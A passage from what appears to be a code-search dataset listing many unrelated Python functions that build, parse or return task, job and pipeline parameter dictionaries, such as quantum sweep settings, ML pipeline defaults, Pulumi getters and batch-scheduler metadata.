value_params['t0'],\n value_params['t0'] + value_params['delta_t'],\n value_params['pts'])\n task['sweep_points'] = SweepPoints()\n task['sweep_points'].add_sweep_parameter(values=values,\n **sweep_points_kws)\n\n qb_v = task_list_fields.get('qb', None)\n if qb_v is not None:\n task['qb'] = qb.name\n\n for k, v in task_list_fields.items():\n if k not in task:\n task[k] = self.get_param_value(k,\n qubit=qb.name,\n default=v[1])\n\n task_list.append(task)\n\n kwargs['task_list'] = task_list\n\n kwargs_super = super().parse_settings(requested_kwargs)\n kwargs_super.update(kwargs)\n\n return kwargs_super", "def humanize_task_params(taskparams):\n taskparams_list = []\n jobparams_list = []\n\n for k in taskparams:\n rec = {'name': k, 'value': taskparams[k]}\n taskparams_list.append(rec)\n taskparams_list = sorted(taskparams_list, key=lambda x: x['name'].lower())\n\n jobparams = taskparams['jobParameters']\n if 'log' in taskparams:\n jobparams.append(taskparams['log'])\n\n for p in jobparams:\n if p['type'] == 'constant':\n ptxt = p['value']\n elif p['type'] == 'template':\n ptxt = \"<i>{} template:</i> value='{}' \".format(p['param_type'], p['value'])\n for v in p:\n if v in ['type', 'param_type', 'value']:\n continue\n ptxt += \" {}='{}'\".format(v, p[v])\n else:\n ptxt = '<i>unknown parameter type {}:</i> '.format(p['type'])\n for v in p:\n if v in ['type', ]:\n continue\n ptxt += \" {}='{}'\".format(v, p[v])\n jobparams_list.append(ptxt)\n jobparams_list = sorted(jobparams_list, key=lambda x: x.lower())\n\n return taskparams_list, jobparams_list", "def get_task_info(self):\n\n print()\n employee_name = self.task.get_employee_name()\n task_name = self.task.get_task_name()\n mins = self.task.get_time_spent()\n notes = self.task.get_notes()\n date = self.task.get_date()\n\n task = {\n 'employee_name': employee_name,\n 'task_name': task_name,\n 'mins': mins,\n 'notes': notes,\n 'date': date\n }\n\n return task", "def _GetRunParameters() -> dict[str, str]:\n result = {}\n for kv in FLAGS.ycsb_run_parameters:\n param, value = kv.split('=', 1)\n result[param] = value\n return result", "def test_task_params(self):\n from sosbeacon.event.message import get_contact_broadcast_task\n\n student_key = Mock()\n student_key.urlsafe.return_value = \"ASTUDENTKEY\"\n\n event_key = Mock()\n event_key.urlsafe.return_value = \"ANEVENTKEY\"\n\n message_key = Mock()\n message_key.urlsafe.return_value = \"SOMEMESSAGEKEY\"\n\n batch_id = \"THEBATCHID\"\n\n contact = {\n 'name': 'Johny Jones',\n 'methods': (\n {'type': 't', 'value': '1234567890'},\n {'type': 'e', 'value': 'johny@jones.com'},\n )\n }\n\n task = get_contact_broadcast_task(\n event_key, message_key, student_key, contact, batch_id)\n\n check_params = {\n 'student': 'ASTUDENTKEY',\n 'event': 'ANEVENTKEY',\n 'message': 'SOMEMESSAGEKEY',\n 'batch': 'THEBATCHID',\n 'contact': json.dumps(contact),\n }\n self.assertEqual(check_params, task.extract_params())", "def workflow_search_dict_task_spec():\n return {\n 'input_key': 'manifest_dtool_task->result->items',\n 'search_key': 'initial_inputs->search',\n 'marker_key': 'initial_inputs->marker',\n 'limit': 1,\n 'expand': True,\n 'stored_data': True,\n 'output_key': 'search_dict_task->result',\n 'loglevel': logging.DEBUG\n }", "def params(self):\n return {'cfg': self.cfg,\n 'momentum': self.momentum,\n 'center': self.center,\n 'scale': self.scale,\n 'epsilon': self.epsilon,\n 'act_fn': self.act_fn}", "def use_task_specific_params(model, task):\n task_specific_params = model.config.task_specific_params\n\n if task_specific_params is not None:\n pars = task_specific_params.get(task, {})\n logger.info(f\"setting model.config to task specific params for {task}:\\n {pars}\")\n logger.info(\"note: command line args may override some of these\")\n model.config.update(pars)", "def parse_settings(self, requested_kwargs):\n kwargs = {}\n task_list = []\n for qb in self.qubits:\n task = {}\n task_list_fields = requested_kwargs['task_list_fields']\n\n value_params = {\n 'delta_t': None,\n 't0': None,\n 'n_periods': None,\n 'pts_per_period': None\n }\n for name, value in value_params.items():\n value = self.get_param_value(name, qubit=qb.name)\n value_params[name] = value\n\n sweep_points_v = task_list_fields.get('sweep_points', None)\n if sweep_points_v is not None:\n # Get first dimension (there is only one)\n # TODO: support for more dimensions?\n sweep_points_kws = next(iter(\n self.kw_for_sweep_points.items()))[1]\n values = np.linspace(\n value_params['t0'],\n value_params['t0'] + value_params['delta_t'],\n value_params['pts_per_period'] * value_params['n_periods'] +\n 1)\n task['sweep_points'] = SweepPoints()\n task['sweep_points'].add_sweep_parameter(values=values,\n **sweep_points_kws)\n\n ad_v = task_list_fields.get('artificial_detuning', None)\n if ad_v is not None:\n task['artificial_detuning'] = value_params['n_periods'] / \\\n value_params['delta_t']\n qb_v = task_list_fields.get('qb', None)\n if qb_v is not None:\n task['qb'] = qb.name\n\n for k, v in task_list_fields.items():\n if k not in task:\n task[k] = self.get_param_value(k,\n qubit=qb.name,\n default=v[1])\n\n task_list.append(task)\n\n kwargs['task_list'] = task_list\n\n kwargs_super = super().parse_settings(requested_kwargs)\n kwargs_super.update(kwargs)\n\n return kwargs_super", "def get_frontend_args(self) -> Dict[str, Any]:\n return {\n \"task_description\": \"Placeholder Task Description - Javascript failed to load\",\n \"frame_height\": 650,\n \"num_subtasks\": self.opts[\"subtasks_per_unit\"],\n \"question\": self.opts[\"eval_question\"],\n \"block_mobile\": True,\n \"get_task_feedback\": False, # TODO(#95) make option\n \"additional_task_description\": self.opts['additional_task_description'],\n }", "def _get_default_pipeline_params(\n project: str,\n location: str,\n root_dir: str,\n target_column: str,\n prediction_type: str,\n optimization_objective: str,\n transformations: str,\n train_budget_milli_node_hours: float,\n stage_1_num_parallel_trials: Optional[int] = None,\n stage_2_num_parallel_trials: Optional[int] = None,\n stage_2_num_selected_trials: Optional[int] = None,\n data_source_csv_filenames: Optional[str] = None,\n data_source_bigquery_table_path: Optional[str] = None,\n predefined_split_key: Optional[str] = None,\n timestamp_split_key: Optional[str] = None,\n stratified_split_key: Optional[str] = None,\n training_fraction: Optional[float] = None,\n validation_fraction: Optional[float] = None,\n test_fraction: Optional[float] = None,\n weight_column: Optional[float] = None,\n study_spec_parameters_override: Optional[List[Dict[str, Any]]] = None,\n optimization_objective_recall_value: Optional[float] = None,\n optimization_objective_precision_value: Optional[float] = None,\n stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n export_additional_model_without_custom_ops: bool = False,\n stats_and_example_gen_dataflow_machine_type: Optional[str] = None,\n stats_and_example_gen_dataflow_max_num_workers: Optional[int] = None,\n stats_and_example_gen_dataflow_disk_size_gb: Optional[int] = None,\n transform_dataflow_machine_type: Optional[str] = None,\n transform_dataflow_max_num_workers: Optional[int] = None,\n transform_dataflow_disk_size_gb: Optional[int] = None,\n dataflow_subnetwork: Optional[str] = None,\n dataflow_use_public_ips: bool = True,\n encryption_spec_key_name: Optional[str] = None,\n additional_experiments: Optional[Dict[str, Any]] = None,\n dataflow_service_account: Optional[str] = None,\n max_selected_features: Optional[int] = None,\n apply_feature_selection_tuning: bool = False,\n run_evaluation: bool = True,\n evaluation_batch_predict_machine_type: Optional[str] = None,\n evaluation_batch_predict_starting_replica_count: Optional[int] = None,\n evaluation_batch_predict_max_replica_count: Optional[int] = None,\n evaluation_batch_explain_machine_type: Optional[str] = None,\n evaluation_batch_explain_starting_replica_count: Optional[int] = None,\n evaluation_batch_explain_max_replica_count: Optional[int] = None,\n evaluation_dataflow_machine_type: Optional[str] = None,\n evaluation_dataflow_starting_num_workers: Optional[int] = None,\n evaluation_dataflow_max_num_workers: Optional[int] = None,\n evaluation_dataflow_disk_size_gb: Optional[int] = None,\n run_distillation: bool = False,\n distill_batch_predict_machine_type: Optional[str] = None,\n distill_batch_predict_starting_replica_count: Optional[int] = None,\n distill_batch_predict_max_replica_count: Optional[int] = None,\n stage_1_tuning_result_artifact_uri: Optional[str] = None,\n quantiles: Optional[List[float]] = None,\n enable_probabilistic_inference: bool = False,\n num_selected_features: Optional[int] = None,\n model_display_name: str = '',\n model_description: str = '',\n) -> Dict[str, Any]:\n if not study_spec_parameters_override:\n study_spec_parameters_override = []\n if not stage_1_tuner_worker_pool_specs_override:\n stage_1_tuner_worker_pool_specs_override = []\n if not cv_trainer_worker_pool_specs_override:\n cv_trainer_worker_pool_specs_override = []\n if not quantiles:\n quantiles = []\n\n parameter_values = {}\n parameters = {\n 'project': project,\n 'location': location,\n 'root_dir': root_dir,\n 'target_column': target_column,\n 'prediction_type': prediction_type,\n 'data_source_csv_filenames': data_source_csv_filenames,\n 'data_source_bigquery_table_path': data_source_bigquery_table_path,\n 'predefined_split_key': predefined_split_key,\n 'timestamp_split_key': timestamp_split_key,\n 'stratified_split_key': stratified_split_key,\n 'training_fraction': training_fraction,\n 'validation_fraction': validation_fraction,\n 'test_fraction': test_fraction,\n 'optimization_objective': optimization_objective,\n 'train_budget_milli_node_hours': train_budget_milli_node_hours,\n 'stage_1_num_parallel_trials': stage_1_num_parallel_trials,\n 'stage_2_num_parallel_trials': stage_2_num_parallel_trials,\n 'stage_2_num_selected_trials': stage_2_num_selected_trials,\n 'weight_column': weight_column,\n 'optimization_objective_recall_value': (\n optimization_objective_recall_value\n ),\n 'optimization_objective_precision_value': (\n optimization_objective_precision_value\n ),\n 'study_spec_parameters_override': study_spec_parameters_override,\n 'stage_1_tuner_worker_pool_specs_override': (\n stage_1_tuner_worker_pool_specs_override\n ),\n 'cv_trainer_worker_pool_specs_override': (\n cv_trainer_worker_pool_specs_override\n ),\n 'export_additional_model_without_custom_ops': (\n export_additional_model_without_custom_ops\n ),\n 'dataflow_subnetwork': dataflow_subnetwork,\n 'dataflow_use_public_ips': dataflow_use_public_ips,\n 'dataflow_service_account': dataflow_service_account,\n 'encryption_spec_key_name': encryption_spec_key_name,\n 'max_selected_features': max_selected_features,\n 'stage_1_tuning_result_artifact_uri': stage_1_tuning_result_artifact_uri,\n 'quantiles': quantiles,\n 'enable_probabilistic_inference': enable_probabilistic_inference,\n 'model_display_name': model_display_name,\n 'model_description': model_description,\n }\n parameter_values.update(\n {param: value for param, value in parameters.items() if value is not None}\n )\n\n if run_evaluation:\n eval_parameters = {\n 'evaluation_batch_predict_machine_type': (\n evaluation_batch_predict_machine_type\n ),\n 'evaluation_batch_predict_starting_replica_count': (\n evaluation_batch_predict_starting_replica_count\n ),\n 'evaluation_batch_predict_max_replica_count': (\n evaluation_batch_predict_max_replica_count\n ),\n 'evaluation_batch_explain_machine_type': (\n evaluation_batch_explain_machine_type\n ),\n 'evaluation_batch_explain_starting_replica_count': (\n evaluation_batch_explain_starting_replica_count\n ),\n 'evaluation_batch_explain_max_replica_count': (\n evaluation_batch_explain_max_replica_count\n ),\n 'evaluation_dataflow_machine_type': evaluation_dataflow_machine_type,\n 'evaluation_dataflow_starting_num_workers': (\n evaluation_dataflow_starting_num_workers\n ),\n 'evaluation_dataflow_max_num_workers': (\n evaluation_dataflow_max_num_workers\n ),\n 'evaluation_dataflow_disk_size_gb': evaluation_dataflow_disk_size_gb,\n 'run_evaluation': run_evaluation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in eval_parameters.items()\n if value is not None\n }\n )\n\n # V1 pipeline without FTE\n if num_selected_features is None:\n if not additional_experiments:\n additional_experiments = {}\n\n parameters = {\n 'transformations': transformations,\n 'stats_and_example_gen_dataflow_machine_type': (\n stats_and_example_gen_dataflow_machine_type\n ),\n 'stats_and_example_gen_dataflow_max_num_workers': (\n stats_and_example_gen_dataflow_max_num_workers\n ),\n 'stats_and_example_gen_dataflow_disk_size_gb': (\n stats_and_example_gen_dataflow_disk_size_gb\n ),\n 'transform_dataflow_machine_type': transform_dataflow_machine_type,\n 'transform_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'transform_dataflow_disk_size_gb': transform_dataflow_disk_size_gb,\n 'additional_experiments': additional_experiments,\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n if apply_feature_selection_tuning:\n parameter_values.update({\n 'apply_feature_selection_tuning': apply_feature_selection_tuning,\n })\n\n if run_distillation:\n distillation_parameters = {\n 'distill_batch_predict_machine_type': (\n distill_batch_predict_machine_type\n ),\n 'distill_batch_predict_starting_replica_count': (\n distill_batch_predict_starting_replica_count\n ),\n 'distill_batch_predict_max_replica_count': (\n distill_batch_predict_max_replica_count\n ),\n 'run_distillation': run_distillation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in distillation_parameters.items()\n if value is not None\n }\n )\n\n # V2 pipeline (with FTE)\n else:\n if run_distillation:\n raise ValueError(\n 'Distillation is currently not supported'\n ' when num_selected_features is specified.'\n )\n\n parameters = {\n 'num_selected_features': num_selected_features,\n 'dataset_level_custom_transformation_definitions': [],\n 'dataset_level_transformations': [],\n 'tf_auto_transform_features': {},\n 'tf_custom_transformation_definitions': [],\n 'legacy_transformations_path': transformations,\n 'feature_transform_engine_dataflow_machine_type': (\n transform_dataflow_machine_type\n ),\n 'feature_transform_engine_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'feature_transform_engine_dataflow_disk_size_gb': (\n transform_dataflow_disk_size_gb\n ),\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n return parameter_values", "def get_required_params():\n return {}", "def get_params(self):\n return {\n \"nspecies\": self.nspecies,\n \"lmax\": self.lmax,\n \"nmax\": self.nmax,\n \"rcut\": self.rcut,\n \"sigma\": self.sigma,\n \"trans_width\": self.trans_width\n }", "def _default_params(self) -> Dict[str, Any]:\n normal_params = {\n \"temperature\": self.temperature,\n \"max_tokens\": self.max_tokens,\n \"top_p\": self.top_p,\n \"frequency_penalty\": self.frequency_penalty,\n \"presence_penalty\": self.presence_penalty,\n \"n\": self.n,\n # \"best_of\": self.best_of,\n \"request_timeout\": self.request_timeout,\n \"logit_bias\": self.logit_bias,\n }\n return {**normal_params, **self.model_kwargs}", "def task_parameters(self):\n yield self.properties", "def get_params(self):\n return {}", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def get_params(self):\n return {'k': self.k, 'q': self.q, 'sigma_s': self.sigma_s, 'm': self.m}", "def getJobDict(self):\n c = \"/cli:python /app:matrix /cmd:getinfo /dev:joblist\"\n self.sendCMDstring(c)\n time.sleep(self.delay)\n answers = self.readandparseCAM()\n joblist = {}\n for a in answers:\n if a['dev']=='joblist':\n for i in range(int(a['count'])):\n nr = a['jobid' +str(i+1)]\n name = a['jobname' +str(i+1)].lower()\n joblist[name]=nr\n else:\n print \"no joblist in answers\"\n return joblist", "def parse_settings(self, requested_kwargs):\n kwargs = {}\n task_list = []\n for qb in self.qubits:\n task = {}\n task_list_fields = requested_kwargs['task_list_fields']\n\n value_params = {'v_low': None, 'v_high': None, 'pts': None}\n\n for name, value in value_params.items():\n value = self.get_param_value(name, qubit=qb.name)\n value_params[name] = value\n\n sweep_points_v = task_list_fields.get('sweep_points', None)\n if sweep_points_v is not None:\n # Get first dimension (there is only one)\n # TODO: support for more dimensions?\n sweep_points_kws = next(iter(\n self.kw_for_sweep_points.items()))[1]\n values = np.linspace(value_params['v_low'],\n value_params['v_high'],\n value_params['pts'])\n task['sweep_points'] = SweepPoints()\n # FIXME: why is values_func an invalid paramteter, if it is in\n # kw_for_sweep_points?\n sweep_points_kws.pop('values_func', None)\n task['sweep_points'].add_sweep_parameter(values=values,\n **sweep_points_kws)\n\n qb_v = task_list_fields.get('qb', None)\n if qb_v is not None:\n task['qb'] = qb.name\n\n for k, v in task_list_fields.items():\n if k not in task:\n task[k] = self.get_param_value(k,\n qubit=qb.name,\n default=v[1])\n\n task_list.append(task)\n\n kwargs['task_list'] = task_list\n\n kwargs_super = super().parse_settings(requested_kwargs)\n kwargs_super.update(kwargs)\n\n return kwargs_super", "def get_job_details():\n job = dict()\n job['dids'] = json.loads(os.getenv('DIDS', None))\n job['metadata'] = dict()\n job['files'] = dict()\n job['algo'] = dict()\n job['secret'] = os.getenv('secret', None)\n algo_did = os.getenv('TRANSFORMATION_DID', None)\n if job['dids'] is not None:\n for did in job['dids']:\n # get the ddo from disk\n filename = '/data/ddos/' + did\n print(f'Reading json from {filename}')\n with open(filename) as json_file:\n ddo = json.load(json_file)\n # search for metadata service\n for service in ddo['service']:\n if service['type'] == 'metadata':\n job['files'][did] = list()\n index = 0\n for file in service['attributes']['main']['files']:\n job['files'][did].append(\n '/data/inputs/' + did + '/' + str(index))\n index = index + 1\n if algo_did is not None:\n job['algo']['did'] = algo_did\n job['algo']['ddo_path'] = '/data/ddos/' + algo_did\n return job", "def get_job_details():\n job = dict()\n job['dids'] = json.loads(os.getenv('DIDS', None))\n job['metadata'] = dict()\n job['files'] = dict()\n job['algo'] = dict()\n job['secret'] = os.getenv('secret', None)\n algo_did = os.getenv('TRANSFORMATION_DID', None)\n if job['dids'] is not None:\n for did in job['dids']:\n # get the ddo from disk\n filename = '/data/ddos/' + did\n print(f'Reading json from {filename}')\n with open(filename) as json_file:\n ddo = json.load(json_file)\n # search for metadata service\n for service in ddo['service']:\n if service['type'] == 'metadata':\n job['files'][did] = list()\n index = 0\n for file in service['attributes']['main']['files']:\n job['files'][did].append(\n '/data/inputs/' + did + '/' + str(index))\n index = index + 1\n if algo_did is not None:\n job['algo']['did'] = algo_did\n job['algo']['ddo_path'] = '/data/ddos/' + algo_did\n return job", "def _task_info_format(task_info_ref):\n if task_info_ref is None:\n return {}\n return {\n 'task_id': task_info_ref['task_id'],\n 'input': task_info_ref['input'],\n 'result': task_info_ref['result'],\n 'message': task_info_ref['message'],\n }", "def get_schedule_meeting_params(params):\n duration = None\n if \"duration\" in params and params[\"duration\"]:\n duration = params[\"duration\"][\"amount\"]\n if params[\"duration\"][\"unit\"] == \"h\":\n duration *= 60\n\n result = {\"datetime\": get_datetime(params), \"duration\": duration}\n\n return result", "def get_metadata(self, db_running_task: SchedulerTask, task_logger: Logger):\n cmd = [f\"qstat -f -F json -x {db_running_task.job_id}\"]\n\n out, err = self._run_command_and_wait(cmd, shell=True)\n # remove values that contains backslash\n # several GPU-related variables contains only a single backslash and nothing else, which will cause loads() to crash\n out = out.replace(\"\\\\\", \"\")\n json_dict = json.loads(out, strict=False)\n\n if \"Jobs\" not in json_dict:\n # a special case when a job is cancelled before getting logged in the scheduler\n task_logger.warning(\n \"job data cannot be retrieved from qstat.\"\n \" likely the job is cancelled before recording.\"\n \" setting job status to CANCELLED\"\n )\n submit_time, start_time, end_time = [0] * 3\n n_cores = 0.0\n run_time = 0\n status = \"CANCELLED\"\n return start_time, end_time, run_time, n_cores, status\n\n tasks_dict = json_dict[\"Jobs\"]\n assert (\n len(tasks_dict.keys()) == 1\n ), f\"Too many tasks returned by qstat: {tasks_dict.keys()}\"\n\n task_name = list(tasks_dict.keys())[0]\n task_dict = tasks_dict[task_name]\n submit_time = task_dict[\"ctime\"].replace(\" \", \"_\")\n start_time = task_dict[\"qtime\"].replace(\" \", \"_\")\n # Last modified time. There isn't an explicit end time,\n # so only other option would be to add walltime to start time\n end_time = task_dict[\"mtime\"].replace(\" \", \"_\")\n # check if 'resources_used' are one of the fields\n if \"resources_used\" in task_dict.keys():\n n_cores = float(task_dict[\"resources_used\"][\"ncpus\"])\n run_time = task_dict[\"resources_used\"][\"walltime\"]\n else:\n # give a dummy data when pbs failed to return json with required field\n n_cores = 1\n run_time = \"00:00:01\"\n\n # status uses the same states as the queue monitor, rather than full words like sacct\n status = task_dict[\"job_state\"]\n\n return start_time, end_time, run_time, n_cores, status", "def get_params(self) -> Dict:\n params: Dict = {}\n params['g_leak'] = self.leak.get_g()\n params['g_kvhh'] = self.kvhh.get_g()\n params['g_cav'] = self.cav.get_g()\n params['g_kca'] = self.kca.get_g()\n params['g_nap'] = self.nap.get_g()\n params['t_ca'] = self.tau_ca\n return params", "def _get_job_dict(self, job):\n\t\t\n\t\tjobs = {}\t\t\n\t\tfor job in self.job_list.items(job):\n\t\t\tjobs[job[0]] = job[1]\n\t\t\t\n\t\treturn jobs", "def sched_parameter(self,i,task):\n dest= task.jobs[i-1]['dlsDestination']\n\n req=''\n #req +=task['jobType']\n ####### FEDE FOR BUG 73010 ############\n try: \n #print \"task['jobType'] = \", task['jobType']\n req +=task['jobType']\n except TypeError:\n msg = \"Error: wrong or missing task info. Your created task can not be submitted. Please check your configuration file and create the task again. \\n \"\n raise CrabException(msg) \n ####################################### \n\n sched_param=''\n sched_param+='Requirements = ' + req +self.specific_req() + self.se_list(dest) +\\\n self.ce_list()[0] +';\\n'\n if self.EDG_addJdlParam: sched_param+=self.jdlParam()\n sched_param+='MyProxyServer = \"' + self.proxyServer + '\";\\n'\n sched_param+='VirtualOrganisation = \"' + self.VO + '\";\\n'\n sched_param+='RetryCount = '+str(self.EDG_retry_count)+';\\n'\n sched_param+='DefaultNodeRetryCount = '+str(self.EDG_retry_count)+';\\n'\n sched_param+='ShallowRetryCount = '+str(self.EDG_shallow_retry_count)+';\\n'\n sched_param+='DefaultNodeShallowRetryCount = '+str(self.EDG_shallow_retry_count)+';\\n'\n\n return sched_param", "def __read_job_params_file__(self):\n # | - __read_job_params_file__\n job_params = {}\n\n # file_path = self.full_path + \"/\" + \"job_parameters.json\"\n\n file_exists = False\n\n file_path = os.path.join(\n self.full_path,\n \"job_parameters.json\")\n if os.path.exists(file_path):\n file_exists = True\n with open(file_path, \"r\") as fle:\n job_params = json.load(fle)\n\n\n ind_i = self.full_path.rfind(self.full_path.split(\"/\")[-1])\n path_i_rt = self.full_path[:ind_i - 1]\n\n file_path = os.path.join(\n # self.full_path[0:-2],\n path_i_rt,\n \"job_parameters.json\",\n )\n if os.path.exists(file_path):\n file_exists = True\n with open(file_path, \"r\") as fle:\n job_params = json.load(fle)\n\n\n file_path = os.path.join(\n # self.full_path[0:-2],\n path_i_rt,\n \"job_params.json\",\n )\n if os.path.exists(file_path):\n file_exists = True\n with open(file_path, \"r\") as fle:\n job_params = json.load(fle)\n\n if not file_exists:\n print(\"No job_params file found for following job:\")\n print(self.full_path)\n\n return(job_params)\n # __|", "def parameters(self):\n return {\"W\": self.W,\n \"T\": self.T,\n \"P\": self.P,\n \"Wo\": self.Wo,\n \"To\": self.To,\n \"Po\": self.Po}", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_params():\n\n parser = get_params_parser()\n args = parser.parse_args()\n\n tasks = [args.raw, args.enrich, args.identities_load, args.identities_merge, args.panels]\n\n if not any(tasks):\n print(\"No tasks enabled\")\n sys.exit(1)\n\n return args", "def parameters(self) -> Optional[pulumi.Input['MemcacheParametersArgs']]:\n return pulumi.get(self, \"parameters\")", "def get_params(self):\n return {'classifier': self.classifier,\n 'grid_param': self.grid_param,\n 'n_param_comb': self.n_param_comb,\n 'top_bagging': self.bagging,\n 'bagging_param': self.bagging_param,\n 'comb_seed': self.comb_seed}", "def _kwargs(self):\n dict = DAG._kwargs(self) \n dict[\"inputpaths\"] = self.inputpaths\n dict[\"outputpath\"] = self.outputpath\n dict[\"query\"] = self.query\n return dict", "def get_params(self) -> Dict:\n params: Dict = {}\n channel: str\n for channel in list(self.channel.keys()):\n if self.channel_bool[channel]:\n params[channel] = self.channel[channel].get_g()\n if self.tau_ca != float('inf'):\n params['t_ca'] = self.tau_ca\n return params", "def _load_dict(self, kwargs):\n # TaskInfo always needs a description and task_type, but all other\n # supported (optional) parameters are loaded from kwargs to\n keyword_args = dict(kwargs)\n task_id = TaskInfo._dpop(keyword_args, \"id\")\n if task_id is not None:\n self.id = task_id\n\n priority = TaskInfo._dpop(keyword_args, \"priority\")\n if priority is None:\n priority = TaskPriority.MEDIUM\n else:\n priority = int(priority)\n\n description = TaskInfo._dpop(keyword_args, \"description\")\n if description is not None:\n self.description = description\n\n task_type = TaskInfo._dpop(keyword_args, \"type\")\n if task_type is not None:\n self.type = task_type\n\n # store unknown args so that they are not lost across\n # serialization/deserialization\n self._unknown_args = keyword_args\n\n self.set_priority(priority)", "def _prerun(self, sess, task_a_data, task_b_data):\r\n fdict = self.get_fdict(task_a_data=task_a_data, task_b_data=task_b_data)\r\n return fdict", "def parameters(self) -> Mapping[str, str]:\n return pulumi.get(self, \"parameters\")", "def realSchedParams(self,cfg_params):\n self.rb_param_file=''\n if (not cfg_params.has_key('GRID.rb')):\n cfg_params['GRID.rb']='CERN'\n self.rb_param_file=common.scheduler.rb_configure(cfg_params.get(\"GRID.rb\"))\n self.wms_service=cfg_params.get(\"GRID.wms_service\",'')\n self.skipWMSAuth=cfg_params.get(\"GRID.skipwmsauth\",1)\n params = { 'service' : self.wms_service, \\\n 'config' : self.rb_param_file, \\\n 'skipWMSAuth' : self.skipWMSAuth\n }\n return params", "def parameters(self) -> Dict[str, Any]:\n return self.trainer_parameters", "def args_map_custom(cls) -> dict:\n args = {}\n args.update(cls.args_map_export())\n args.update({\"json_flat\": False})\n return args", "def get_job_parameters(self, jobName):\n if not self.get_server_instance():\n print(colored('Server instance not received', 'red'))\n return False\n\n if not self.server.has_job(jobName):\n print(colored('Job [' + jobName + '] not found', 'red'))\n return False\n\n return self.server[jobName].get_params_list()", "def _identifying_params(self) -> Mapping[str, Any]:\n return {**{\"model_name\": self.model_name}, **self._default_params}", "def _get_base_dict(self):\n res = dict(\n task=self._task,\n timestamp=self._timestamp,\n metric=self._metric,\n variant=self._variant\n )\n if self._iter is not None:\n res.update(iter=self._iter)\n if self._model_event is not None:\n res.update(model_event=self._model_event)\n return res", "def get_params():\n return {\"tweet.fields\": \"id,text,author_id,conversation_id,\"\n \"created_at,geo,in_reply_to_user_id,lang,\"\n \"public_metrics,source\"}", "def get_recipe_params(self):\n return self.recipe_settings.get('params')", "def set_task(self, task: dict):\n self.graph = task['graph']\n self.game_length = task['game_length']\n\n # Setup task parameters.\n self.num_subtasks = len(self.graph.subtask_id_list)\n self.subtask_reward = self.graph.subtask_reward\n self.subtask_id_list = self.graph.subtask_id_list # task-specific subtask ids\n\n # Setup map parameters.\n self.map.set_map(\n subtask_id_list=self.subtask_id_list,\n map_parameters=task['map_parameters']\n )", "def _get_vars(self, variables, required=None):\n return_dict = {}\n for variable in variables:\n return_dict[variable] = self.module.params.get(variable)\n else:\n if isinstance(required, list):\n for var_name in required:\n check = return_dict.get(var_name)\n if check is None:\n self.failure(\n error='Missing [ %s ] from Task or found a None'\n ' value' % var_name,\n rc=000,\n msg='variables %s - available params [ %s ]'\n % (variables, self.module.params)\n )\n return return_dict", "def getParametersFromTraj(self, traj):\n # DO NOT use short names for star notation dicts\n runParams = self.traj.parameters.f_to_dict(short_names=not self.parameterSpace.star, fast_access=True)\n runParams = self._validatePypetParameters(runParams)\n return dotdict(runParams)", "def parameters(self) -> Dict[str, Any]:\n return self.data[\"args\"].get(\"parameters\", {})", "def _params(self, request: Request) -> dict:\n params = {'forceAsync': True}\n\n subset = self._spatial_subset_params(request) + self._temporal_subset_params(request)\n if len(subset) > 0:\n params['subset'] = subset\n\n for p, val in request.parameter_values():\n if type(val) == str:\n params[p] = val\n elif type(val) == bool:\n params[p] = str(val).lower()\n elif type(val) == list and type(val[0]) != str:\n params[p] = ','.join([str(v) for v in val])\n else:\n params[p] = val\n\n return params", "def params():\n return utils.Params('../experiments/base-model/params.json')", "def get_job_id(self):\n return {'job_id': self._job_id}", "def step_extract_parameters(self) -> list:\n result = []\n if self.has_step_field(\"task.parameters\"):\n for param in self.step_field(\"task.parameters\"):\n for key in param:\n result += [\"-p\", key, param[key]]\n return result", "def get_report_parameters(self, args, default_mask=0):\n # Get the task|project filter keyword and an alias\n pname = tname = ''\n mask = 0\n if args[0] in ('task', 'project'):\n if not len(args) >= 2:\n print(\"*** Error: Wrong format of the object parameter '%s'\"\n \"\" % args[0])\n return\n tname, pname = self.validate_object(\n keyword=args[0], thing=args[1].decode('utf-8'))\n args = args[2:]\n # Get 'extend' parameter\n if args and args[0] == 'extend':\n if len(args) == 1:\n print(\"*** Error: Wrong extend bitmask.\")\n return\n # Get mask if 'extend' parameter presents\n mask = helpers.parse_extend_mask(args[1])\n args = args[2:]\n mask = default_mask if not mask else mask\n # Get dates\n started, finished = helpers.parse_date_parameters(args)\n return tname, pname, started, finished, mask" ]
